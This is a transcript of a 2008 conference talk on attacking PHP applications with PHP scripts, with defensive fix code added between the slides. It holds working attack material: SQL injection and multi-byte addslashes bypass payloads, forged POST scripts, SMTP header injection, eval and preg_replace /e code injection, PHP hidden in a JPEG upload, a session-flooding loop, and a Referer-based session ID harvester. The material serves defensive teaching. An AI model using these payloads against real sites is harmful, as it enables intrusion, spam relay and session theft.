
Exploiting PHP with PHP


Arpad Ray's PHPNW08 slides:

Looking at websites from the perspective of potential attackers is a useful technique not only for security professionals.
This talk demonstrates how to use simple PHP scripts to exploit many common security holes in PHP applications, hopefully giving developers a deeper understanding of what it is they are protecting against.

* Getting around common precautions against SQL injection
* Free spam with SMTP injection
* Making a malicious website to exploit PHP sessions
* The holes every attacker hopes for
* Making use of a newly exploited website

Published in: Technology


1. Exploiting PHP with PHP. Arpad Ray @ PHPNW08
2-6. Why use PHP for this?
  * We already know how to write PHP
  * Can use directly in test scripts
  * PHP provides everything we need
  * Writing PHP can be very quick
  * Can efficiently re-use and combine attacks
7. SQL injection
  * Probably the first attack most PHP developers hear of

8-10. SQL injection
  * $q = "SELECT * FROM foobar WHERE id = $_GET[id]";
  * index.php?id=1 OR 1=1  ->  $_GET['id'] = '1 OR 1=1';
  * $q = "SELECT * FROM foobar WHERE id = 1 OR 1=1";

11-13. SQL injection
  * $q = "SELECT * FROM foobar WHERE id = '$_GET[id]'";
  * index.php?id=' OR ''='  ->  $_GET['id'] = "' OR ''='";
  * $q = "SELECT * FROM foobar WHERE id = '' OR ''=''";

14. SQL injection
  * $q = "SELECT * FROM foobar WHERE id = '$_POST[id]'";

15. SQL injection
  * $q = "SELECT * FROM foobar WHERE id = $_POST[id]";
  * A POST request is no harder to forge than a GET; a plain HTML form will do:
      <form method="post" action="http://example.com/foo.php">
        <input type="hidden" name="id" value="1 OR 1=1" />
        <input type="submit" />
      </form>

16. SQL injection
  * $q = "SELECT * FROM foobar WHERE id = $_POST[id]";
  * The same request from a PHP script:
      $context = stream_context_create(array('http' => array(
          'method'  => 'post',
          'content' => 'id=1 OR 1=1'
      )));
      file_get_contents('http://example.com/foo.php', false, $context);

17. SQL injection
  * $q = 'SELECT * FROM foobar WHERE id = ' . addslashes($id);
18. addslashes()
  * $id = addslashes($_POST['id']);
    $q = "SELECT * FROM foobar WHERE id = '$id'";
  * $_POST['id'] = "' OR ''='";
  * $q = "SELECT * FROM foobar WHERE id = '\' OR \'\'=\''";

19-22. addslashes()
  * Getting around that pesky backslash
  * Multi-byte character attacks
  * Swallow the backslash with a multi-byte character ending with that byte
  * <start of mb character><single quote>  // apply addslashes()  ->  <mb character><single quote>

23-24. addslashes()
      $mbCharacter = "\xBF\x5C";
      $quote = substr($mbCharacter, 0, -1) . "'";
      $id = "$quote OR $quote$quote = $quote";
      $context = stream_context_create(array('http' => array(
          'method'  => 'post',
          'content' => http_build_query(array('id' => $id))
      )));
      file_get_contents('http://example.com/foo.php', false, $context);
  * Resulting query (? stands for the two-byte character that has swallowed the backslash):
    $q = "SELECT * FROM foobar WHERE id = '?' OR '?'='?'";

25. addslashes()
  * As above, with $id = "$quote OR 1=1 /*";
  * $q = "SELECT * FROM foobar WHERE id = '?' OR 1=1 /*'";
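The fix for the whole SQL injection and addslashes() sequence above, as an added example that is not from the slides: the same id lookup with a bound parameter, run against an in-memory SQLite table constructed here so it works offline. The table name foobar and the inputs are taken from the slides; the rows and the column name are made up.

```php
<?php
// Added example, not from the slides. The slides' lookup
// "SELECT * FROM foobar WHERE id = '$_POST[id]'" rewritten with a bound
// parameter, so the payloads from slides 9, 12 and 25 are compared as data
// rather than parsed as SQL. Table contents are constructed for the demo.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE foobar (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO foobar (id, name) VALUES (1, 'alice'), (2, 'bob')");
// For MySQL the DSN would carry the connection charset, e.g.
// 'mysql:host=db;dbname=app;charset=utf8mb4', so that client-side escaping
// and the server agree on what a multi-byte character is; that mismatch is
// what the "\xBF\x5C" trick on slides 23-25 relies on. Keep emulated
// prepares off (PDO::ATTR_EMULATE_PREPARES => false) so values never get
// spliced into the query text at all.

function find_by_id(PDO $pdo, string $id): array
{
    // Type check first: a numeric id has no business containing quotes,
    // so anything else is rejected before it gets near the database.
    if (!ctype_digit($id)) {
        return [];
    }
    $stmt = $pdo->prepare('SELECT id, name FROM foobar WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Inputs taken from the slides; only the legitimate one returns a row.
$inputs = [
    '1',                // legitimate request
    '1 OR 1=1',         // slide 9
    "' OR ''='",        // slide 12
    "\xBF' OR 1=1 /*",  // slide 25: multi-byte lead byte, then a quote
];
foreach ($inputs as $id) {
    printf("%-22s -> %d row(s)\n", addcslashes($id, "\0..\37\177..\377"),
        count(find_by_id($pdo, $id)));
}
```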
26-29. magic_quotes_gpc
  * Uses addslashes() so escaping is not secure
  * Fosters complacency
  * Applications using magic quotes are much harder to make truly portable
  * Inconsistencies between PHP versions

30. magic_quotes_gpc
  * Magic quotes only touch GET, POST and cookie data; other request headers arrive unescaped:
      $context = stream_context_create(array('http' => array(
          'user_agent' => $foo
      )));

      $context = stream_context_create(array('http' => array(
          'method' => 'get',
          'header' => 'X-Foo: ' . $foo
      )));

31. magic_quotes_gpc
  * ?scalar'1=foo&array'1[scalar'2]=foo&array'1[array'2][scalar'3]=foo

32. magic_quotes_gpc
  * Expected result:
      Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )

33. magic_quotes_gpc
  * PHP 4.3.3
      Array ( [scalar\'1] => foo [array\'1] => Array ( [scalar\'2] => foo [array'2] => Array ( [scalar\'3] => foo ) ) )

34. magic_quotes_gpc
  * PHP 4.4.0
      Array ( [scalar\'1] => foo [array\'1] => Array ( [scalar\'2] => foo [array'2] => Array ( [scalar\'3] => foo ) ) )

35. magic_quotes_gpc
  * PHP 5.0.0 (OFF)
      Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )

36. magic_quotes_gpc
  * PHP 5.2.2
      Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )

37-39. magic_quotes_gpc
  * There are also problems disabling magic_quotes_gpc
  * The usual recursive undo:
      function stripslashes_deep($value)
      {
          $value = is_array($value)
              ? array_map('stripslashes_deep', $value)
              : stripslashes($value);
          return $value;
      }
  * Instead of passing id=1 we can pass: 'id' . str_repeat('[]', 1000) . '=1'
  * We can trivially force the web server to do a lot of unnecessary work
40-43. Denial of Service
  * Failure to release resources
  * Writing user data to disk
      function fill_sessions($url, $num = 1000)
      {
          $context = stream_context_create(array(
              'http' => array('method' => 'HEAD')
          ));
          for ($i = $num; $i--;) {
              file_get_contents($url, false, $context);
          }
      }
  * Locking customer accounts
44-45. SMTP injection
      $to = 'foobar@example.com';
      $subject = $_POST['subject'];
      $from = $_POST['from'];
      mail($to, $subject, 'From: ' . $from);

46. SMTP injection
      $context = stream_context_create(array('http' => array(
          'method'  => 'post',
          'content' => http_build_query(array(
              'subject' => "foo Cc: target@example.com",
              'from'    => "from@example.com Cc: target@example.com"
          ))
      )));

47-50. SMTP injection
  * Variable mail address
  * Sanitisation
  * Validation
  * /^[^@]+@(?:\w+\.)+\w{2,6}$/
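A hardened version of the slide 45 handler, added here and not part of the slides: the sanitisation and validation steps from slides 47-50 applied before any user value reaches a mail header. The field names, recipient and rejected payload are the ones the slides use; the message field is an assumption.

```php
<?php
// Added example, not from the slides: slide 45's handler with the
// sanitisation and validation from slides 47-50 applied to every
// user-supplied value before it can reach a mail header.

function header_value(string $value): string
{
    // Header injection needs a line break (or a NUL that some MTAs treat
    // as one). Reject rather than strip, so the attempt shows up in logs.
    if (preg_match('/[\r\n\0]/', $value)) {
        throw new InvalidArgumentException('line break in header value');
    }
    return trim($value);
}

function sender_address(string $from): string
{
    // A single, RFC-shaped address: filter_var refuses anything containing
    // whitespace, so "from@example.com\nCc: target@example.com" fails here
    // before header_value() would even see the line break.
    $clean = filter_var(trim($from), FILTER_VALIDATE_EMAIL);
    if ($clean === false) {
        throw new InvalidArgumentException('invalid From address');
    }
    return $clean;
}

function send_contact_mail(array $post, string $to = 'foobar@example.com'): bool
{
    try {
        $subject = header_value($post['subject'] ?? '');
        $from    = sender_address($post['from'] ?? '');
    } catch (InvalidArgumentException $e) {
        error_log('mail form input rejected: ' . $e->getMessage());
        return false;
    }
    // Only validated values go into headers; the free-text message (an
    // assumed extra field) goes into the body, where line breaks are harmless.
    $body = (string) ($post['message'] ?? '');
    return mail($to, $subject, $body, 'From: ' . $from);
}

// Constructed input: the slide 46 payload with its line breaks written out.
$attack = [
    'subject' => "foo\nCc: target@example.com",
    'from'    => "from@example.com\nCc: target@example.com",
];
var_dump(send_contact_mail($attack)); // bool(false): nothing was sent
```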
51-53. Hot vulnerabilities
  * Direct eval() injection
      class Foo
      {
          function Foo()
          {
              $a = func_get_args();
              print_r($a);
          }
      }
      eval('$foo = new Foo(' . implode(',', $args) . ');');
  * $args[0] = 'readfile("/etc/passed")';

54-56. Hot vulnerabilities
  * preg_replace() using /e modifier
      $s = '$-42 dollars';
      preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s);
      // result: '42'
  * The captured text is evaluated as PHP, so it can close abs() and call anything:
      $s = '$1).foobar().abs(1 dollars';
      preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s);
      // result: '4242'
  * Quotes are escaped by /e, but chr() gets around that:
      $s = '$1).readfile(chr(47).chr(101)...abs(1 dollars';
      preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s);
      // result: '4242'

57. Hot vulnerabilities
  * Variable in include() call
      $page = $_GET['page'];
      include $page;

58-59. Hot vulnerabilities
  * Direct eval() injection
  * preg_replace() using /e modifier
  * Variable in include() call
  * Uploading PHP files
    - Check file extension
    - Check uploaded MIME type
    - Check file MIME type
    - Move outside of web root

60. Hot vulnerabilities
  * A valid image with PHP appended passes the MIME checks:
      $script = <<<EOT
      <?php var_dump('hello world!');
      EOT;
      $jpeg = '/path/to/some_valid.jpg';
      $fp = fopen($jpeg, 'ab');
      fwrite($fp, $script);
      fclose($fp);

61-62. Hot vulnerabilities
  * Direct eval() injection
  * preg_replace() using /e modifier
  * Variable in include() call
  * Uploading PHP files
  * Shell injection
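The four upload checks from slide 59 in working form, added here and not from the slides. It assumes an upload directory (UPLOAD_DIR) outside the web root and an image-only allow-list, and it is ordered so that the appended-PHP JPEG from slide 60 may be stored but can never be executed.

```php
<?php
// Added example, not from the slides: the four checks listed on slide 59,
// ordered so that a JPEG with PHP appended (slide 60) is never executable.
// UPLOAD_DIR is an assumed path outside the document root.
const UPLOAD_DIR = '/var/app/uploads';
const ALLOWED    = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

function store_upload(array $file): string
{
    // $file is one entry of $_FILES; refuse anything PHP did not upload itself.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    // 1. Extension from an allow-list (never from the client's MIME claim).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // 2. The client-declared type must agree; cheap, but forgeable, so not final.
    if (($file['type'] ?? '') !== ALLOWED[$ext]) {
        throw new RuntimeException('declared type mismatch');
    }
    // 3. Sniff the bytes. A valid JPEG with PHP appended still sniffs as
    //    image/jpeg, which is why step 4 is the one that actually matters.
    $sniffed = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($sniffed !== ALLOWED[$ext]) {
        throw new RuntimeException('content is not ' . ALLOWED[$ext]);
    }
    // 4. Random server-side name, outside the web root, no execute bit: the
    //    file can only ever be read back and served, never included or run.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);
    return $dest;
}

function serve_upload(string $stored, string $ext): void
{
    // Serve with a fixed type from outside the web root; the request never
    // names a path the web server could hand to the PHP interpreter.
    header('Content-Type: ' . ALLOWED[$ext]);
    header('X-Content-Type-Options: nosniff');
    readfile($stored);
}
```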
63. Making an evil website
  * HTTP requests can give us lots of interesting information
  * PHPSESSID = bingo

64-65. Making an evil website
  * A session id carried in the URL of the linking page arrives in the Referer header:
      if (isset($_SERVER['HTTP_REFERER'])) {
          if (preg_match('/ PHPSESSID=([^=&]+) |
                           (?<==)([a-f\d]{32}|[a-f\d]{40}) /xi',
                         $_SERVER['HTTP_REFERER'])) {
              // ...
          }
      }
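A defence against the Referer harvesting on slides 63-65, added here and not from the slides: a session setup that keeps the id out of URLs (so it cannot leak into a Referer) and logs any id that arrives in the query string anyway. The function names are assumptions; the cookie_samesite option needs PHP 7.3 or later.

```php
<?php
// Added example, not from the slides: keep the session id out of URLs so it
// can never appear in a Referer header like the one slide 64 searches, and
// log the cases where one shows up anyway.

function start_hardened_session(): void
{
    // Detection: an id arriving in the query string is either a leaked link
    // or a fixation attempt. Record it; use_only_cookies below ignores it.
    if (isset($_GET[session_name()])) {
        error_log(sprintf('session id in URL from %s for %s',
            $_SERVER['REMOTE_ADDR'] ?? '?', $_SERVER['REQUEST_URI'] ?? '?'));
    }
    session_start([
        'use_only_cookies' => 1,      // never accept an id from the URL
        'use_trans_sid'    => 0,      // never rewrite links to carry PHPSESSID
        'use_strict_mode'  => 1,      // refuse ids this server did not issue
        'cookie_httponly'  => true,   // not readable by script
        'cookie_secure'    => true,   // sent over HTTPS only
        'cookie_samesite'  => 'Lax',  // not attached to cross-site navigations
    ]);
}

function login_user(string $user): void
{
    // Fresh id at every privilege change, so an id captured earlier is useless.
    session_regenerate_id(true);
    $_SESSION['user'] = $user;
}
```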
66-70. Making use of victims
  * File scan
      $dir = new RecursiveIteratorIterator(
          new RecursiveDirectoryIterator('/', true)
      );
      foreach ($dir as $file) {
          echo $file->getPathname(), "\n";
      }
  * Subverting existing files
  * Escalate privileges, take over machine
  * botnet.php
71. Questions?
